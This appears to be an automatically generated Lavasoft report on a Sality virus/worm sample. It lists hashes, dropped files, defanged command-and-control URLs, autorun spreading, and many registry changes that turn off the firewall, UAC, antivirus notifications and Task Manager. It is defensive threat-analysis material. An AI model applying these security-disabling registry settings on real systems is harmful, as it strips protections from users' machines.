Virus.Win32.Sality_a78e948b94

by malwarelabrobot on September 21st, 2015 in Malware Descriptions.

not-a-virus:AdWare.Win32.SwiftBrowse.o (Kaspersky), Virus.Win32.Sality.FD, Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Worm, Virus, Adware, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: a78e948b9438fb5d0b463a9109373fed
SHA1: 2ef8856b7b309736cb5ced4a518da3facbd6b990
SHA256: 156fa42bd3c54c5730c66990be5c3c834b801c5bc82186e7771385c207dfb73e
SSDeep: 12288:EvHTO3scLzbKfI1s15Ap/G/8/3D0Fw/tN8dkmLtpHHHrh7OGwZpnZfI:EvHK3scL6j8/z0FmcLbH1OGwvnZg
Size: 659872 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:52:01
Analyzed on: WindowsXP SP3 32-bit


Summary:

Virus. A program that recursively replicates a possibly evolved copy of itself.

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Virus's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Virus creates the following process(es):

%original file name%.exe:652
NetCrawl.mg.exe:1964

The Virus injects its code into the following process(es):

Explorer.EXE:532

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:652 makes changes in the file system.
The Virus creates and/or writes to the following file(s):

%WinDir%\system.ini (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (3277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (8400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2AB_Rar\%original file name%.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (259958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (7 bytes)

The Virus deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (0 bytes)

Registry activity

The process %original file name%.exe:652 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKCU\Software\Aas]
"a4_116" = "831618036"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a3_78" = "542637991"
"a3_79" = "549622726"
"a3_72" = "533156193"
"a3_73" = "506656128"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

[HKCU\Software\Aas]
"a3_71" = "525712590"
"a3_76" = "561686245"
"a3_77" = "568613636"
"a3_74" = "513568291"
"a3_75" = "554631746"
"a4_108" = "774265068"
"a4_109" = "781434189"
"a4_102" = "731250342"
"a4_103" = "738419463"
"a4_100" = "716912100"
"a4_101" = "724081221"
"a4_106" = "759926826"
"a4_107" = "767095947"
"a4_104" = "745588584"
"a4_105" = "752757705"
"a2_59" = "422983856"
"a2_58" = "415802315"
"a2_53" = "379969112"
"a2_52" = "372800953"
"a2_51" = "365618500"
"a2_50" = "358449632"
"a2_57" = "408633546"
"a2_56" = "401467511"
"a2_55" = "394299628"
"a2_54" = "387133857"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Aas]
"a4_55" = "394301655"
"a4_54" = "387132534"
"a4_57" = "408639897"
"a4_56" = "401470776"
"a4_51" = "365625171"
"a4_50" = "358456050"
"a4_53" = "379963413"
"a4_52" = "372794292"

[HKCU\Software\Aas\695404737]
"50183847" = "1F9250EF2381E2D9AE4EF061ECA0F3D0A24F2023E89C2CC85BD49E90D6877045BE906EB0B25DD268CB741DC41D5C0FD47CEE5BA9EC3B7870BCA79176776C9A465761F37DEECEAF24ABF58324DE41122D8DABCB3B58798401D9A821FDDE7FC8A4F09BD1E0428648329420F6E9AF57D2FFB6D3C8D7335A31244418C372DFCCE75F"

[HKCU\Software\Aas]
"a4_59" = "422978139"
"a4_58" = "415809018"

[HKCU\Software\Aas\695404737]
"21507363" = "0"

[HKCU\Software\Aas]
"a3_94" = "690598327"
"a3_95" = "698045910"
"a3_96" = "671534665"
"a3_97" = "678453992"
"a3_90" = "662052915"
"a3_91" = "669107282"
"a3_92" = "643004661"
"a3_93" = "649993492"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a3_98" = "685967115"
"a3_99" = "726580138"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Aas]
"a2_99" = "709741282"
"a2_98" = "702576061"
"a2_97" = "695410606"
"a2_96" = "688239508"
"a2_95" = "681059844"
"a2_94" = "673890690"
"a2_93" = "666723460"
"a2_92" = "659566940"
"a2_91" = "652391676"
"a2_90" = "645229003"
"a1_58" = "545363527"
"a1_59" = "205689605"
"a1_56" = "3940586342"
"a1_57" = "2060004643"
"a1_54" = "2506314952"
"a1_55" = "680372722"
"a1_52" = "4207284457"
"a1_53" = "3523504239"
"a1_50" = "2646820777"
"a1_51" = "3330681222"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a3_43" = "324843106"
"a3_42" = "284237251"
"a3_41" = "277248416"
"a3_40" = "269796609"
"a3_47" = "353765350"
"a3_46" = "313221959"
"a3_45" = "305778468"
"a3_44" = "332278405"
"a3_49" = "368270520"
"a3_48" = "360822809"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Aas]
"a4_99" = "709742979"
"a4_98" = "702573858"
"a2_118" = "845962026"
"a4_91" = "652390011"
"a4_90" = "645220890"
"a4_93" = "666728253"
"a4_92" = "659559132"
"a4_95" = "681066495"
"a4_94" = "673897374"
"a4_97" = "695404737"
"a4_96" = "688235616"
"a3_109" = "798021476"
"a3_108" = "790966981"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"

[HKCU\Software\Aas]
"a3_101" = "707522668"
"a3_100" = "733503437"
"a3_103" = "754977070"
"a3_102" = "714511503"
"a3_105" = "769475040"
"a3_104" = "762555713"
"a3_107" = "750493346"
"a3_106" = "742980099"
"a2_113" = "810112586"
"a2_112" = "802943978"

"a3_70" = "485103791"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a2_110" = "788595675"
"a2_117" = "838793882"
"a2_116" = "831612138"
"a2_115" = "824446511"
"a2_114" = "817277332"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Aas]
"a1_104" = "3321202338"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas\695404737]
"35845605" = "402"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Aas]
"a3_116" = "814879197"
"a3_117" = "821922428"
"a3_114" = "834001179"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas]
"a3_115" = "807894458"
"a1_89" = "16034278"
"a1_88" = "66581252"
"a1_85" = "3215076366"
"a1_84" = "796374511"
"a1_87" = "726907533"
"a1_86" = "786512168"
"a1_81" = "139351495"
"a1_80" = "3744106988"
"a1_83" = "3235138390"

"a3_110" = "771902343"
"a3_111" = "778955814"
"a1_67" = "1184186628"
"a1_66" = "3861986246"
"a1_65" = "477675258"
"a1_64" = "2462488458"
"a1_63" = "3938061697"
"a1_62" = "4069992483"
"a1_61" = "1862491724"
"a1_60" = "1304747143"
"a1_69" = "3815860347"
"a1_68" = "827716490"
"a1_12" = "3347564497"
"a1_13" = "522418618"
"a1_10" = "2640225927"
"a1_11" = "2032942692"
"a1_16" = "4114681913"
"a1_17" = "1545574841"
"a1_14" = "3901474534"
"a1_15" = "1014618575"
"a4_115" = "824448915"
"a4_114" = "817279794"
"a1_18" = "3513914988"
"a1_19" = "2871035642"
"a4_111" = "795772431"
"a4_110" = "788603310"
"a4_113" = "810110673"
"a4_112" = "802941552"
"a2_48" = "344127027"
"a2_49" = "351283360"
"a2_40" = "286765755"
"a2_41" = "293942851"
"a2_42" = "301097397"
"a2_43" = "308265093"
"a2_44" = "315446800"
"a2_45" = "322616157"
"a2_46" = "329783293"
"a2_47" = "336949814"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Aas]
"a4_42" = "301103082"
"a4_43" = "308272203"
"a4_40" = "286764840"
"a4_41" = "293933961"
"a4_46" = "329779566"
"a4_47" = "336948687"
"a4_44" = "315441324"
"a4_45" = "322610445"
"a4_48" = "344117808"
"a4_49" = "351286929"
"a3_18" = "112354555"
"a3_19" = "152901914"
"a3_14" = "83367783"
"a3_15" = "124488582"
"a3_16" = "131411001"
"a3_17" = "104906840"
"a3_10" = "88506851"
"a3_11" = "95435266"
"a3_12" = "69459621"
"a3_13" = "76378820"
"a4_37" = "265257477"
"a4_36" = "258088356"
"a4_35" = "250919235"
"a4_34" = "243750114"
"a4_33" = "236580993"
"a4_32" = "229411872"
"a4_31" = "222242751"
"a4_30" = "215073630"
"a4_39" = "279595719"
"a4_38" = "272426598"
"a1_103" = "4263468156"
"a1_102" = "3287715323"

[HKCU\Software\Aas\695404737]
"28676484" = "35"

[HKCU\Software\Aas]
"a1_101" = "959177234"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Aas]
"a2_88" = "630888512"
"a2_89" = "638057302"
"a2_84" = "602208452"
"a2_85" = "609373204"
"a2_86" = "616539846"
"a2_87" = "623706389"
"a2_80" = "573523784"
"a3_34" = "260325067"
"a2_82" = "587858648"
"a2_83" = "595044364"
"a1_29" = "3756295128"
"a1_28" = "2666588485"
"a1_23" = "1341895885"
"a1_22" = "1201749000"
"a1_21" = "3651443608"
"a1_20" = "3686174937"
"a1_27" = "3229029095"
"a1_26" = "2733721999"
"a1_25" = "2741006536"
"a1_24" = "3944226378"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Aas]
"a3_50" = "341766363"
"a3_51" = "348755322"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"

[HKCU\Software\Aas]
"a3_53" = "396796476"
"a3_54" = "370165343"
"a3_55" = "377748222"
"a3_56" = "384737041"
"a3_57" = "425210800"
"a3_58" = "432789459"
"a3_59" = "406145138"
"a2_111" = "795777928"
"a2_31" = "222234366"
"a2_30" = "215079716"
"a2_33" = "236579700"
"a2_32" = "229420813"
"a2_35" = "250914025"
"a2_34" = "243748196"
"a2_37" = "265265678"
"a2_36" = "258096247"
"a2_39" = "279598384"
"a2_38" = "272431193"
"a4_79" = "566360559"
"a4_78" = "559191438"
"a4_73" = "523345833"
"a4_72" = "516176712"
"a4_71" = "509007591"
"a4_70" = "501838470"
"a4_77" = "552022317"
"a4_76" = "544853196"
"a4_75" = "537684075"
"a4_74" = "530514954"
"a4_86" = "616544406"
"a4_87" = "623713527"
"a4_84" = "602206164"
"a4_85" = "609375285"
"a4_82" = "587867922"
"a4_83" = "595037043"
"a4_80" = "573529680"
"a4_81" = "580698801"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = "1"

[HKCU\Software\Aas]
"a4_88" = "630882648"
"a4_89" = "638051769"
"a2_100" = "716909694"

[HKCU\Software\Aas\695404737]
"14338242" = "0"
"7169121" = "217"

[HKCU\Software\Aas]
"a2_102" = "731243332"
"a2_103" = "738410538"
"a2_104" = "745596017"
"a2_105" = "752759678"
"a2_106" = "759926299"
"a2_107" = "767093664"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Aas]
"a1_96" = "4114495355"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Aas]
"a1_107" = "75537886"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Aas]
"a1_106" = "1905142164"
"a1_105" = "2561533072"
"a1_98" = "559672055"
"a1_99" = "1110375132"
"a1_92" = "1109944736"
"a1_93" = "429891561"
"a1_90" = "3232901796"
"a1_91" = "563406027"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"

[HKCU\Software\Aas]
"a1_97" = "350953880"
"a1_94" = "3962604742"
"a1_95" = "1304519820"
"a2_75" = "537689669"
"a2_74" = "530520381"
"a2_77" = "552020224"
"a2_76" = "544860422"
"a2_71" = "509014829"
"a2_70" = "501836153"
"a2_73" = "523353220"
"a2_72" = "516173523"
"a1_100" = "431852721"
"a2_79" = "566352092"
"a2_78" = "559189913"
"a1_74" = "1682865374"
"a1_75" = "2629242397"
"a1_76" = "1424397328"
"a1_77" = "63183220"
"a1_70" = "4017115453"
"a1_71" = "87761972"
"a1_72" = "2231819788"
"a1_73" = "2715500761"
"a1_78" = "3874640351"
"a1_79" = "2231058103"
"a1_109" = "901695256"
"a1_108" = "3790730434"
"a1_0" = "3183258191"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKCU\Software\Aas]
"a1_2" = "4080157083"
"a1_3" = "3907000049"
"a1_4" = "270366800"
"a1_5" = "2795759188"
"a1_6" = "2548062973"
"a1_7" = "1369105564"
"a3_29" = "224867540"
"a3_28" = "183865525"
"a1_116" = "2003951785"
"a1_117" = "847050724"
"a1_110" = "3187308900"
"a1_111" = "3361228126"
"a1_112" = "595962318"
"a1_9" = "3159057467"
"a3_21" = "167399900"
"a3_20" = "159956413"
"a3_23" = "148336286"
"a3_22" = "140888703"
"a3_25" = "195929936"
"a3_24" = "188875569"
"a3_27" = "176880658"
"a3_26" = "169827315"
"a4_24" = "172058904"
"a4_25" = "179228025"
"a4_26" = "186397146"
"a4_27" = "193566267"
"a4_20" = "143382420"
"a4_21" = "150551541"
"a4_22" = "157720662"
"a4_23" = "164889783"
"a4_28" = "200735388"
"a4_29" = "207904509"
"a2_81" = "580704669"
"a3_112" = "785940569"

"a3_113" = "826942712"
"a2_101" = "724089138"
"a1_38" = "1943117499"
"a1_39" = "1441008798"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKCU\Software\Aas]
"a1_30" = "2491654672"
"a1_31" = "3175058885"
"a1_32" = "4252732059"
"a1_33" = "1086018071"
"a1_34" = "126805938"
"a1_35" = "3807567877"
"a1_36" = "982601683"
"a1_37" = "189200723"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Aas]
"a2_108" = "774260148"
"a2_109" = "781425946"
"a3_69" = "478110732"
"a3_68" = "470664173"
"a3_65" = "449123976"
"a3_64" = "442135145"
"a3_67" = "497168202"
"a3_66" = "489720619"
"a3_61" = "454263092"
"a3_60" = "413199509"
"a3_63" = "468244982"
"a3_62" = "461186391"
"a1_1" = "481917349"
"a2_28" = "200730093"
"a2_29" = "207898152"
"a2_26" = "186396554"
"a2_27" = "193562647"
"a2_24" = "172061441"
"a2_25" = "179230362"
"a2_22" = "157727157"
"a2_23" = "164895666"
"a2_20" = "143379376"
"a2_21" = "150542710"
"a4_68" = "487500228"
"a4_69" = "494669349"
"a4_60" = "430147260"
"a4_61" = "437316381"
"a4_62" = "444485502"
"a4_63" = "451654623"
"a4_64" = "458823744"
"a4_65" = "465992865"
"a4_66" = "473161986"
"a4_67" = "480331107"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Aas]
"a2_7" = "50177102"
"a2_6" = "43022743"
"a2_5" = "35842126"
"a2_4" = "28674212"
"a2_3" = "21499892"
"a2_2" = "14341029"
"a2_1" = "7174630"
"a2_0" = "5951"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Aas]
"a2_9" = "64528147"

"a4_5" = "35845605"
"a4_4" = "28676484"
"a4_7" = "50183847"
"a4_6" = "43014726"
"a4_1" = "7169121"
"a4_0" = "0"
"a4_3" = "21507363"
"a4_2" = "14338242"
"a4_9" = "64522089"
"a4_8" = "57352968"
"a3_52" = "389745053"
"a2_8" = "57359054"
"a3_87" = "607024862"
"a3_86" = "633131711"
"a3_85" = "626081308"
"a3_84" = "585598461"
"a3_83" = "578085210"
"a3_82" = "571034939"
"a3_81" = "597665944"
"a3_80" = "590099577"
"a3_89" = "654610320"
"a3_88" = "614067057"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 DF 10 C0 5B AE 62 FE 5E 62 5D 2E C7 01 CD 61"

[HKCU\Software\Aas]
"a1_8" = "1443424694"
"a1_82" = "850347685"
"a2_62" = "444485803"
"a2_63" = "451651996"
"a2_60" = "430152107"
"a2_61" = "437317681"
"a2_66" = "473167898"
"a2_67" = "480334420"
"a2_64" = "458819313"
"a2_65" = "465986252"
"a2_68" = "487503764"
"a2_69" = "494670698"
"a1_41" = "238612446"
"a1_40" = "1419969911"
"a1_43" = "3582830897"
"a1_42" = "323824292"
"a1_45" = "3015243103"
"a1_44" = "2821628314"
"a1_47" = "3861899901"
"a1_46" = "1101151282"
"a1_49" = "2566100455"
"a1_48" = "1730315373"

[HKCU\Software\Aas\695404737]
"43014726" = "0B00687474703A2F2F6572656E6B61726168616E2E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F677574656B706C2E7A612E706C2F6C6F676F2E67696600687474703A2F2F7777772E6B61707564616E652E636F6D2F6C6F676F2E67696600687474703A2F2F69676F72666F6D696E2E72752F6C6F676F2E67696600687474703A2F2F6D32636F6D756E69636163696F6E2E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6C65656E61656E7465727072697365732E636F6D2F696D672F6C6F676F2E67696600687474703A2F2F7777772E67657269617472696173696E6F702E636F6D2E62722F696D672F627574746F6E2E67696600687474703A2F2F627269746973686D6F746F72732E69742F6C6F676F2E67696600687474703A2F2F617274726F6F6D2E636F6D2E74722F626C6F672F6C6F676F2E67696600687474703A2F2F67616D6D61636F6E7365696C2E66722F696D616765732F627574746F6E2E67696600687474703A2F2F786578796C69612E636F6D2F6C6F676F2E676966"

[HKCU\Software\Aas]
"a3_118" = "862924447"
"a1_114" = "4133660471"
"a1_115" = "2776377689"
"a3_36" = "241268621"
"a3_37" = "248309804"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"

[HKCU\Software\Aas]
"a3_35" = "267899754"
"a3_32" = "212854281"
"a3_33" = "253401768"
"a3_30" = "231909751"
"a3_31" = "205278614"
"a1_113" = "1283144070"
"a3_38" = "289377359"
"a3_39" = "296296686"

"a1_118" = "2422978816"

"a2_17" = "121866737"
"a2_16" = "114712328"
"a2_15" = "107542081"
"a2_14" = "100362345"
"a2_13" = "93195901"
"a2_12" = "86024915"
"a2_11" = "78869622"
"a2_10" = "71696066"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"

[HKCU\Software\Aas]
"a2_19" = "136210088"
"a2_18" = "129045649"
"a4_11" = "78860331"
"a4_10" = "71691210"
"a4_13" = "93198573"
"a4_12" = "86029452"
"a4_15" = "107536815"
"a4_14" = "100367694"
"a4_17" = "121875057"
"a4_16" = "114705936"
"a4_19" = "136213299"
"a4_18" = "129044178"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKCU\Software\Aas]
"a3_8" = "40388897"
"a3_9" = "47967552"
"a3_6" = "59977839"
"a3_7" = "67032206"
"a3_4" = "11991981"
"a3_5" = "52535244"
"a3_2" = "31040235"
"a3_3" = "4933386"
"a3_0" = "17001001"
"a3_1" = "23989832"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Aas]
"a4_118" = "845956278"
"a4_117" = "838787157"

The Virus modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Firewall notifications are disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"

The Virus modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Task Manager is disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"

The Virus modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"

The Virus deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process NetCrawl.mg.exe:1964 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B EE FD F8 71 86 00 99 F2 FB 6D F8 2E 65 BA 8A"

Dropped PE files

MD5 File path
9b22fa552e37770118146e753a34d03f c:\xfdei.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Virus's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 22738 23040 4.49116 4dde9ee04459a4d76108ba4e7e9cf6a4
.rdata 28672 4496 4608 3.59034 a2c7710fa66fcbb43c7ef0ab9eea5e9a
.data 36864 253816 1024 3.1957 acf5fcee4a8110074c3935a8dde700a9
.ndata 290816 688128 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 978944 81920 80384 5.5234 b13f4a1cf59c57c4de44cfc5ec7498cd

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://netcrawl.info/mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA==
hxxp://netcrawl.info/mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y
hxxp://netcrawl.info/mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ==
hxxp://netcrawl.info/fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR
